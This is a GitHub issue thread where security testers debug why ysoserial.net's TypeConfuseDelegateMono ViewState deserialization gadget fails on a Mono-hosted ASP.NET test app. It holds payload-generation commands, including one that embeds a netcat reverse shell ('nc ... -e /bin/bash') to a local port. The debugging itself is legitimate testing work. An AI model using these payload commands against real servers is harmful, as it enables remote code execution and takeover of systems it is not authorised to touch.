Payload for Mono not working

Question

Payload for Mono not working

halfluke opened this issue 4 years ago · comments

Hi.

Any idea why the typeconfusedelegatemono doesn't work for me?

I built the supersimple example from https://www.monodevelop.com/documentation/creating-aspnet-projects/ and I run it in xsp4, but the viewstate - which should be MAC enabled but not encrypted, .net 4.0 version, looks weird and the payload generated by ysoserial.net - which is much longer - does not work. I'm using a specific validationkey in web.config for testing.

%2FwEMDAwQAgAADgEMBQMMEAIAAA4BDAUBDBACDA8BAQRUZXh0AQ5Zb3UgY2xpY2tlZCBtZQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALvN0281sXomxFcIhy33ycX5EfZiafqaB78GIBHdjmVX

Mono Version Information: 6.10.0.104 (tarball Fri Jun 26 19:38:24 UTC 2020); ASP.NET Version: 4.0.30319.42000

Payload generated with:
./ysoserial.exe -p ViewState -g TypeConfuseDelegateMono -c "nc 127.0.0.1 555 -e /bin/bash" --path="/Default.aspx" --apppath="/" --islegacy --validationalg="SHA1" --validationkey="xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx" --isdebug

Soroush Dalili · Answer 1 · Mon Jul 27 2020 21:49:48 GMT+0800 (China Standard Time)

I can recreate this issue but I don't know how to debug it properly. It seems that it does not also understand ViewStateEncryptionMode="Never" also the following does not disable the MAC validation:

<appSettings>
      <add key="aspnet:AllowInsecureDeserialization" value="true" />
</appSettings>

I am not exactly sure why but it would be great if someone with more information can help here.

sushant dhopat · Answer 2 · Mon Jan 04 2021 22:42:25 GMT+0800 (China Standard Time)

where is it ./ysoserial.exe file in this tool i didnt get

gogo2464 · Answer 3 · Fri Jan 15 2021 06:17:29 GMT+0800 (China Standard Time)

I have got the same troublewith the command .\ysoserial.exe -f BinaryFormatter -g TypeConfuseDelegateMono -o raw -c "calc" -t. A sound is produced but no calc appears.

@sushantdhopat19 ./ysoserial.exe is the compiled binary. To get it I launched ysoserial.sln and build from visual studio.

This commit used to work: https://github.com/pwntester/ysoserial.net/commit/138e21649b9b3977b95f7d3c42e637e17861598c as told in this post. I think Mono has been updated and the gadget is not valuable anymore.

This article may help: https://i.blackhat.com/us-18/Thu-August-9/us-18-Haken-Automated-Discovery-of-Deserialization-Gadget-Chains.pdf

gogo2464 · Answer 4 · Fri Jan 15 2021 07:51:44 GMT+0800 (China Standard Time)

I will get a look at the gadgets. Assign me please. But continue to notify me if somebody wants to make a PR too. I may take a long time.

gogo2464 · Answer 5 · Fri Jan 15 2021 08:27:14 GMT+0800 (China Standard Time)

I order to locate the trouble I made a tiny vulnerable program. THen I put a file \ysoserial.exe -f BinaryFormatter -g TypeConfuseDelegateMono -o raw -c "calc" > tmp.dat

EDIT
When I deserialize, I get the following:
END OF EDIT

Binary stream '0' does not contain a valid BinaryHeader. Possible causes are invalid stream or object version change between serialization and deserialization.

It is useful to find the right gadget.

gogo2464 · Answer 6 · Fri Jan 15 2021 23:39:39 GMT+0800 (China Standard Time)

I have found a good article online. I will read it: https://googleprojectzero.blogspot.com/2017/04/exploiting-net-managed-dcom.html

gogo2464 · Answer 7 · Sat Jan 16 2021 01:27:36 GMT+0800 (China Standard Time)

@halfluke can you just tell me if you have the same symptom with the calc please?

halfluke · Answer 8 · Sat Jan 16 2021 07:38:03 GMT+0800 (China Standard Time)

I can't confirm about the calc because I tried to generate a payload for linux. How would I test a calc payload if it has to run under linux?

gogo2464 · Answer 9 · Sat Jan 16 2021 21:12:37 GMT+0800 (China Standard Time)

@halfluke try another command like .\ysoserial.exe -f BinaryFormatter -g TypeConfuseDelegateMono -o raw -c "touch file.txt" -t

gogo2464 · Answer 10 · Sun Jan 17 2021 00:03:04 GMT+0800 (China Standard Time)

I found on internet an article of how this code was built: http://muffsec.com/blog/?p=585

gogo2464 · Answer 11 · Sun Jan 17 2021 04:13:39 GMT+0800 (China Standard Time)

In my opinion the code used to be very near from this code : http://muffsec.com/blog/?p=585 but now SessionSecurityToken has been removed from https://docs.microsoft.com/en-us/dotnet/api/system.identitymodel.tokens.sessionsecuritytoken?view=netframework-4.8 and the gadget did not work anymore. The modification might have been removed from the history and might have not been replaced yet.

EDIT: I was wrong the package is still avaible in nuget. See: https://stackoverflow.com/questions/19797557/add-a-reference-to-the-system-identitymodel-tokens-dll But is it present on Mono? I am going to dig.

EDIT: I need an older mono version to test. The newer version of mono.

The code from muffsec works on my machine now. I needed to use old .net framework: https://stackoverflow.com/questions/19797557/add-a-reference-to-the-system-identitymodel-tokens-dll.

Sadly I just realise it was the code for TypeConfuseDelegate. Not TypeConfuseDelegateMono. I have to dig deeper and deeper.

gogo2464 · Answer 12 · Tue Jan 19 2021 20:20:13 GMT+0800 (China Standard Time)

I am going to try to compile with mono to check the payload.

halfluke · Answer 13 · Tue Jan 19 2021 20:23:10 GMT+0800 (China Standard Time)

Sorry, I do not have time to test much at the moment. Thank you for your efforts.

Soroush Dalili · Answer 14 · Wed Aug 17 2022 05:53:47 GMT+0800 (China Standard Time)

It should work in the latest version now (download it from https://github.com/mono/mono/actions)